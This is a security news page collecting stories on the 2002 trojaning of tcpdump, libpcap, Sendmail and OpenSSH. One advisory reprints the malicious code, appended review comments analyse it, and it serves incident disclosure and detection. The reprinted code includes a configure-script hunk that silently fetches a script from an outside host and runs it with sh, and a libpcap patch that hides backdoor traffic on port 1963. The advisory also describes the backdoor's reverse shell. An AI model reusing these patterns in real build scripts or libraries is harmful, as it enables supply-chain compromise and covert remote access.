Stay Ahead With Linux Security News

Explore Latest Linux Security news


Capture Network Packets Remotely Using Cisco Router and Tcpdump

Have you ever thought about your routers? I mean, *really* thought about them? They think all day long, processing all of the packets in and out of your company. PCs with almost any operating system can be configured with tcpdump or windump (with Wireshark or whatever GUI you'd care to hang in front of it) to do packet capture and analysis. But if the traffic you are trying to capture is halfway across the world (or maybe closer but still too far to drive), can you use your router to capture packets in a standard libpcap format? As you've probably guessed, the answer is YES, or else there

The link for this article located at SANS is no longer available.

Nov 20, 2009 | Anthony Pell | Network Security

Trojan Horse Impact on Sendmail, OpenSSH, and tcpdump Software

At least three commonly used open source software packages were altered by black-hat (bad-guy) hackers to contain "Trojan horse" code this year. The three most commonly used packages affected were Sendmail, OpenSSH and tcpdump/libpcap. Others to be modified included BitchX, a chat client, and Fragrouter, a network security tool. In all of these cases, the unknown cracker gained entry to the relevant download sites and embedded the back door code in the installation packages.

The link for this article located at ZDNet.com.au is no longer available.

Dec 27, 2002 | LinuxSecurity.com Team | Hacks/Cracks

Tcpdump and Libpcap Security Advisory: Spyware Attack Detected

Security experts warn system administrators that rogue hackers have implanted spyware in the latest version of a popular open-source network-monitoring tool and its code library. The main Web site for downloading a popular open-source network-monitoring tool remained off-line Thursday following a revelation that rogue hackers had implanted spyware in the latest version of the software. Copies of tcpdump, a utility for monitoring data traffic on a network, and its library of code, called libpcap, had both been corrupted on the site, according to Michael Richardson, Webmaster for the site and a member of the open-source project that maintains the tools. "The server has been taken down until we can be sure we have found the problem," Richardson said in a phone interview Thursday. However, other sites had already downloaded the software from the main server and hosted the files on their own computers, a practice known as mirroring. It's unknown how many of these other sites have corrupted copies of the code, said Richardson, although some have already confirmed that they have found the Trojan horse. Tcpdump is a utility used by Unix, Linux and BSD system administrators to monitor--or "sniff"--the data that passes over the network. Libpcap is a code library that helps programmers write programs to tap into network data on many different platforms. The spyware component of the tainted software--called "conftes.c"--enables the hackers to send and execute any command on computers that contain the modified utility.

The attack bears some hallmarks of a group of hackers that struck two other open-source projects, Sendmail and OpenSSH, in October. Specifically, the Trojan horse has commands that can be triggered by using the letters a, d and m--the name of a major underground hacking group. Whether the actual hackers were members of ADM, were framing the group, or were just using the group's tools is unknown. The hackers apparently broke into the server over the weekend from a computer in Finland and replaced the code with a corrupted version. The infected software remained available for more than two days because, Richardson said, he had been away from the main server, located in Canada, and the people who found the problem--members of the Houston Linux Users Group--didn't notify him. "It would have been nice to have a little bit more warning," Richardson said. "No one contacted me from that group." Matt Solnik, president of the Houston Linux Users Group, said the group contacted one of the other members of the tcpdump project less than an hour after realizing the software had been compromised. Another HLUG member, Russell Adams, had been installing Snort, an open-source intrusion detection system that uses the libpcap library, when a test that matches the software package with a unique fingerprint failed. The fingerprints, known more formally as digital signatures, are used as a security measure to make sure the software can't be surreptitiously changed. "He found some interesting code and we looked over it and found that it was a Trojan," Solnik said. By Tuesday night, HLUG had extracted the Trojan horse and had started notifying tcpdump's maintainers, said Solnik. Richardson expects to start analyzing the server Thursday night. He couldn't say when the project's server would again be available. More information is available in an advisory released by Carnegie Mellon University's Computer Emergency Response Team (CERT) Coordination Center.

The link for this article located at News.com is no longer available.

Nov 14, 2002 | LinuxSecurity.com Team | Hacks/Cracks

Tcpdump.org Incident: Trojan Found in Downloaded Utilities

The download site for two very common Linux based utilities, tcpdump.org, was hacked into on Nov. 11, and the software available for download was modified to contain Trojan Horse code. This Trojan Horse, or "back door" software allows the hacker that wrote it to access any machine on which the modified software is run. The two software items affected are tcpdump and libpcap, tools commonly used in information security applications. Some Intrusion Detection System (IDS) software requires libpcap. This is the most recent in a string of similar attacks. Sendmail, one of the most widely used e-mail server software packages, was also "trojaned" recently. Others affected in recent months have included OpenSSH, the secure remote access software, and even Fragroute, a hacker utility. The identity of the hacker conducting this campaign is unknown, as is whether a connection exists between the separate incidents. CERT released an advisory in which they "...encourage sites using libpcap and tcpdump to verify the authenticity of their distribution, regardless of where it was obtained." CERT provided the information necessary to determine the authenticity of any libpcap or tcpdump software recently downloaded. The advisory also encourages users to verify all software before installing it. "As a matter of good security practice, the CERT/CC encourages users to verify, whenever possible, the integrity of downloaded software."

The link for this article located at ZDNet is no longer available.

Nov 14, 2002 | LinuxSecurity.com Team | Hacks/Cracks

Tcpdump & Libpcap Trojan Alert: Significant Exploit Detected

tcpdump and libpcap were trojaned on tcpdump.org and all but 1 official mirror. This trojan, similar to the OpenSSH trojan from a few months ago, was caught by Gentoo's Portage System. When the configure script is run, it downloads a script from mars.raketti.net. This script contains an embedded shell script that creates and compiles a C source file that is not part of the tcpdump/libpcap distribution.

Latest libpcap & tcpdump sources from tcpdump.org contain a trojan.

Background: Libpcap provides a packet sniffing library for programs like Snort. Tcpdump is a standard tool for packet sniffing.

Details: The trojan contains modifications to the configure script and gencode.c (in libpcap only). The configure script downloads a script which is then sourced with the shell. It contains an embedded shell script that creates a C file, and compiles it. The program connects to 212.146.0.34 (mars.raketti.net) on port 1963 and reads one of three one-byte status codes:

A - program exits
D - forks and spawns a shell and does the needed file descriptor manipulation to redirect it to the existing connection to 212.146.0.34.
M - closes connection, sleeps 3600 seconds, and then reconnects

Hmm... ADM... It's important to note that it reuses the same outgoing connection for the shell. This gets around firewalls that block incoming connections. Gencode.c is modified to force libpcap to ignore packets to/from the backdoor program, hiding the backdoor program's traffic. This is similar to the OpenSSH trojan a few months ago.

Updates: Many Mirrors are infected with the trojan!!!
Main Mirror Site (wiretapped.net) will no longer be providing tcpdump downloads until things are straightened out.

Good sources:
MD5 Sum 0597c23e3496a5c108097b2a0f1bd0c7 libpcap-0.7.1.tar.gz
MD5 Sum 6bc8da35f9eed4e675bfdf04ce312248 tcpdump-3.6.2.tar.gz
MD5 Sum 03e5eac68c65b7e6ce8da03b0b0b225e tcpdump-3.7.1.tar.gz

Trojaned sources:
MD5 Sum 73ba7af963aff7c9e23fa1308a793dca libpcap-0.7.1.tar.gz
MD5 Sum 3a1c2dd3471486f9c7df87029bf2f1e9 tcpdump-3.6.2.tar.gz
MD5 Sum 3c410d8434e63fb3931fe77328e4dd88 tcpdump-3.7.1.tar.gz

The (relevant) gencode.c diff: *** 288,293 **** --- 289,318 ---- { extern int n_errors; int len; + int l; + char *port = "1963"; + char *str, *tmp, *new = "not port 1963"; + + if (buf && *buf && strstr (buf, port)) { + buf = "port 1964"; + } + else { + l = strlen (new) + 1; + if (!(!buf || !*buf)) { + l += strlen (buf); + l += 5; /* and */ + } + + str = (char *)malloc (l); + str[0] = '\0'; + if (!(!buf || !*buf)) { + strcpy (str, buf); + strcat (str, " and "); + } + + strcat (str, new); + buf = str; + } no_optimize = 0; n_errors = 0; ***************

The (relevant) configure diff: + CNF="services" + URL="mars.raketti.net/~mash/$CNF" ! (IFS="," ! ARGS="wget -q -O -,lynx --source,fetch -q -o -" ! ! for i in $ARGS; do ! IFS=" " ! $i $URL 1> $CNF ! if [ -f $CNF ]; then sh $CNF ! exit ! fi ! rm -f $CNF ! done) 1> /dev/null 2> /dev/null &

The "services" payload: trojan-script, the non-obfuscated portion (excerpted); services, the complete version

Thanks to: Russell Adams, Mathew Solnik, Scott Stout with the Houston Linux Users Group. Additional thanks to Bruce Locke for interpreting the backdoor code. Thanks to Antioffline.com for hosting us, and Gentoo's Portage system for catching the trojaned files via checksums.

Last update: Wed Nov 13 03:44:08 CST 2002
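Review bot: the gencode.c hunk rewrites the caller's filter expression before it ever reaches the parser, which is a hard reject on its own: any filter string containing "1963" is replaced wholesale with "port 1964", and every other filter, including an empty one, gets " and not port 1963" appended via `strcat (str, new); buf = str;`. The effect is exactly the hiding behaviour the advisory describes, and it also means a user who asks for `port 1963` silently gets the wrong capture. Two smaller points in the same block: `str = (char *)malloc (l); str[0] = '\0';` uses the allocation without a NULL check, and `char *tmp` is declared and never used. When auditing a libpcap tree, a string-mutation of the filter buffer (strstr/strcat/strcpy on `buf`) at the top of the compile path is the signature to look for; a legitimate change here would never hardcode a port number.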
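Review bot: the configure hunk downloads a file from `mars.raketti.net/~mash/$CNF` (trying wget, lynx and fetch in turn) and immediately runs it with `sh $CNF`, inside a backgrounded subshell whose stdout and stderr are both sent to /dev/null, so nothing appears on the terminal and the build continues normally whether or not the fetch succeeded. A configure script has no reason to fetch and execute remote code, and the silenced `( ... ) 1> /dev/null 2> /dev/null &` wrapper is the tell; note also that the `exit` after `sh $CNF` only leaves the subshell, so the failure path is invisible to the caller. Comparing a downloaded tarball against the published MD5 sums listed above before unpacking is the check that catches this, and it is precisely how Gentoo's Portage system caught it.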
Nov 13, 2002 | LinuxSecurity.com Team | Hacks/Cracks

In-Depth TCP/IP And Tcpdump Manual Created By SANS Professionals

SANS has provided a TCP/IP and tcpdump flyer guide.

The link for this article located at SANS is no longer available.

May 01, 2002 | Anthony Pell | Network Security